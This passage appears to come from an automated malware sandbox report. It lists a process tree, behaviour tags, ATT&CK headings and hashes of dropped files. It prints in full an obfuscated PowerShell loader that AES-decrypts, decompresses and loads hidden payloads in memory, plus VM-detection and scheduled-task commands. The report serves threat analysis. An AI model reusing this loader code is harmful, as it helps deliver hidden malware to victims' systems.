'$gddj=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr;'.Replace('lr', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$tBrH=NPFewPF-PFObPFjePFcPFtPF SPFyPFsPFtPFePFm.PFIPFO.PFCPFoPFmpPFrPFePFsPFsiPFonPF.PFGZPFipPFSPFtPFrPFePFamPF($AFBf, [PFIOPF.PFCoPFmpPFrPFePFssPFiPFoPFnPF.PFCoPFmPFprPFePFsPFsiPFoPFnPFMPFodPFe]PF:PF:DPFecPFoPFmPFpPFrPFesPFsPF);'.Replace('PF', ''); $tBrH.CopyTo($gddj); $tBrH.Dispose(); $AFBf.Dispose(); $gddj.Dispose(); $gddj.ToArray();}function rFaI($ELFV,$XuUO){ Invoke-Expression -Verbose '$cPFF=[PJSyPJsPJtePJm.PJRPJePJflPJePJcPJtPJiPJonPJ.PJAsPJsPJePJmbPJlPJyPJ]PJ::PJLoPJaPJd([byte[]]$ELFV);'.Replace('PJ', ''); Invoke-Expression -InformationAction Ignore '$GtPT=$cPFF.EjyntjyrjyyPjyoijynjyt;'.Replace('jy', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$GtPT.WqInWqvWqokWqe(Wq$WqnWqulWqlWq, $XuUO);'.Replace('Wq', '');}$TzAi = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $TzAi;$drwF=[System.IO.File]::ReadAllText($TzAi).Split([Environment]::NewLine);foreach ($EhXl in $drwF) { if ($EhXl.StartsWith('bhKKm')) { $cwwY=$EhXl.Substring(5); break; }}$tyyO=[string[]]$cwwY.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$jQc = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[0].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$oYu = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[1].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$bao = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[2].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');rFaI $jQc $null;rFaI $oYu $null;rFaI $bao (,[string[]] (''));3⤵PID:4840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:4760 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:392
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4268
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:2236
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵PID:2220
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function mlBf($ELFV){ Invoke-Expression -Verbose -WarningAction Inquire '$cUKE=[JZSyJZsJZteJZm.JZSJZeJZcuJZrJZiJZtJZyJZ.CJZrJZypJZtJZoJZgrJZaJZpJZhJZy.JZAeJZsJZ]:JZ:CJZrJZeJZaJZtJZe(JZ)JZ;'.Replace('JZ', ''); Invoke-Expression -WarningAction Inquire -Verbose '$cUKE.MUcodUceUc=[UcSyUcsUctUcemUc.UcSUceUccUcurUciUctyUc.UcCUcryUcpUctUcoUcgrUcapUchUcy.UcCiUcpUchUceUcrUcMoUcdUce]Uc:Uc:UcCBUcCUc;'.Replace('Uc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$cUKE.PGxadGxdGxinGxg=Gx[GxSGxysGxtGxeGxmGx.GxSeGxcGxurGxiGxtGxy.GxCGxrGxyGxptGxogGxrGxapGxhyGx.GxPGxaGxdGxdiGxnGxgMGxoGxdGxe]Gx:Gx:GxPGxKCGxSGx7;'.Replace('Gx', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$cUKE.KmNeymN=mN[SmNysmNtmNemNm.mNCmNomNnmNvmNermNtmN]:mN:mNFmNromNmmNBmNamNsemN64mNSmNtrmNinmNgmN("7mNxhmNEmNmFmNkymNdmNQmNABmNgmNJmNjmNxmN5SmN2mNzXmN4mNgmNyrmNZmN5mNbmNevmNGYmNPmN6NmN3FmNBmNEmNDmNEmNAsmN=mN");'.Replace('mN', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$cUKE.IqHV=qH[qHSyqHstqHeqHmqH.CqHoqHnqHvqHeqHrtqH]qH::qHFqHrqHomqHBqHaqHsqHe6qH4SqHtqHriqHngqH("7qHkeqHvqHCJqHfOqH5qHxqHcGqHIqHhqHeqH7qHI+qH/qHv7qHAqH=qH=");'.Replace('qH', ''); $Llou=$cUKE.CreateDecryptor(); $jyzK=$Llou.TransformFinalBlock($ELFV, 0, $ELFV.Length); $Llou.Dispose(); $cUKE.Dispose(); $jyzK;}function OVPC($ELFV){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$AFBf=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr(,$ELFV);'.Replace('lr', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire '$gddj=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr;'.Replace('lr', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$tBrH=NPFewPF-PFObPFjePFcPFtPF SPFyPFsPFtPFePFm.PFIPFO.PFCPFoPFmpPFrPFePFsPFsiPFonPF.PFGZPFipPFSPFtPFrPFePFamPF($AFBf, [PFIOPF.PFCoPFmpPFrPFePFssPFiPFoPFnPF.PFCoPFmPFprPFePFsPFsiPFoPFnPFMPFodPFe]PF:PF:DPFecPFoPFmPFpPFrPFesPFsPF);'.Replace('PF', ''); $tBrH.CopyTo($gddj); $tBrH.Dispose(); $AFBf.Dispose(); $gddj.Dispose(); $gddj.ToArray();}function rFaI($ELFV,$XuUO){ Invoke-Expression -Verbose '$cPFF=[PJSyPJsPJtePJm.PJRPJePJflPJePJcPJtPJiPJonPJ.PJAsPJsPJePJmbPJlPJyPJ]PJ::PJLoPJaPJd([byte[]]$ELFV);'.Replace('PJ', ''); Invoke-Expression -InformationAction Ignore '$GtPT=$cPFF.EjyntjyrjyyPjyoijynjyt;'.Replace('jy', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$GtPT.WqInWqvWqokWqe(Wq$WqnWqulWqlWq, $XuUO);'.Replace('Wq', '');}$TzAi = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TzAi;$drwF=[System.IO.File]::ReadAllText($TzAi).Split([Environment]::NewLine);foreach ($EhXl in $drwF) { if ($EhXl.StartsWith('bhKKm')) { $cwwY=$EhXl.Substring(5); break; }}$tyyO=[string[]]$cwwY.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$jQc = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[0].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$oYu = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[1].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$bao = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[2].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');rFaI $jQc $null;rFaI $oYu $null;rFaI $bao (,[string[]] (''));5⤵PID:2016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Command and Scripting Interpreter: PowerShell
PID:5108 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:2972
-
-
-
-
-
-
C:\Windows\$nya-onimai2\GfSDSA.exe"C:\Windows\$nya-onimai2\GfSDSA.exe"2⤵PID:1776
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3652
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3844
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3996
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4340
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2440
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3172
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3964
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2764
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:312
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4476
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe df14d2a12e65e5007264caa7d6f58049 0s9IRaWSC06SWoUTa6dUkQ.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:2064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1504
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Writes to the Master Boot Record (MBR)
PID:4344
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38KB
MD5055ac7b0e5190095e4f950d31b7b6e58
SHA1efc97ed49310000ba91899b427f78be07e2a402e
SHA256ad9646c3160c39e9386e7cadc9be0c0e5472f073a2a5f90ac7abd3e1e71bab65
SHA5125d3cc504de95f391309dc8762de42c2b64f0fdb2b262678313870caf7f2261a5ff80005788e2b419d55fc429422404803f2fc319aeac80163a86f3e50bd915a6
-
Filesize
13KB
MD537a0c9cc5b8a2b1a25e0523d94533357
SHA1b1e27bed1379364f59e265c90168e4b7d3d10103
SHA256bcdbafc5bb01312ebf92a51d021c83b1707674f5aadcd0f4d614d328ad81ce3d
SHA512aedf4be4f6e8ec2e3d649de7b81978a1451432cdabb7fa69fb18e419ef67f42c39f5eac1a38999d5cf1b3144c889a149a1ffe90cd9c188edb94228bae567bb90
-
Filesize
3KB
MD577650fb3a039e2abd02f3ab6bf592576
SHA1fd1e506d7014ab2de74aa7168c574834d433045e
SHA2566474561ca144cf3d62566dd284d4de9ec51283cb6ea31a28e4cfb961147e6a97
SHA5124ccf86687efb7b6a1340be3d5f3c3e98f0cf7571c86fccd3d4608e69d5ccfbdee938e07f9c535f109a274e86ff96c2adea1cb053eaf293a024841ea9aa0cc980
-
Filesize
2KB
MD5a1b1eed30534ccc1763132a9c0332696
SHA1a21416c993bff28c342e59c4cd8f055a2b202636
SHA2566f1592bd38822ade736ed68f0ecbab5d764c0325ec2d0b797a978585f77575a2
SHA5123f7acb70fe562eed326115089d27a7e265a3842448dafffe4d330335a60161a77d454066e7a3c056bde1b6260e473685e533717540164b06020e30dade693cda
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.3MB
MD58a7f2cf2f4a59fc4220c677d3b8df79e
SHA16bb7854dc78dcb7a5e419e5eec371f4a776bb6a7
SHA25637f8cdab00b96fa1d7f5edd1c0d7ed1c048b7cf0a94b30e4b2fe507dbd69ebff
SHA51215acdd90a51634c1dbfcbee7dd2822742e42c4618e6590e238ac08abbb26c53e3c3e64e98ddb5439c7499af90eca66bb49c7dfeb5b6e01693e4e521fa5edbfc4
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4